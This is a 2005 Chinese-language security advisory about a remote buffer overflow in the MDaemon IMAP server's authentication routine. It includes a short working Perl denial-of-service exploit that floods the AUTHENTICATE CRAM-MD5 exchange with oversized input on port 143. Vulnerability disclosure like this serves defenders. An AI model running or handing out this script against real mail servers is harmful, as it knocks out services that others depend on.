安全研究
安全漏洞
Alt-N MDaemon IMAP Server认证例程远程溢出漏洞
发布日期:2005-07-20
更新日期:2005-07-20
受影响系统:Alt-N MDaemon 8.0.3
Alt-N MDaemon 8.0.2
Alt-N MDaemon 8.0.1
Alt-N MDaemon 8.0
描述:
BUGTRAQ ID:
14317
Alt-N MDaemon是一款基于Windows的邮件服务程序。
Alt-N MDaemon IMAP Server中存在远程溢出漏洞,成功利用这个漏洞允许在服务程序的环境中执行任意代码。
攻击者可以通过发送特制的请求破坏进程内存,导致缓冲区溢出。
<*来源:kcope (
kingcope@gmx.net)
*>
测试方法:
警 告
以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!
###
### MDAEMON remote DoS exploit by kcope
### looks like there?s a fault in the base64 decoder
### works also for AUTHENTICATE LOGIN
###
use IO::Socket::INET;
$sock = IO::Socket::INET->new(PeerAddr => $ARGV[0],
PeerPort => '143',
Proto => 'tcp');
$a = "q" x 1000;
print $sock "a001 AUTHENTICATE CRAM-MD5\r\n";
print $sock $a,"\r\n";
print $sock $a,"\r\n";
while (<$sock>) {
print $_;
}
建议:
厂商补丁:
Alt-N
-----
目前厂商还没有提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商的主页以获取最新版本:
http://www.altn.com浏览次数:3396
严重程度:0(网友投票)
本安全漏洞由绿盟科技翻译整理,版权所有,未经许可,不得转载 绿盟科技给您安全的保障 |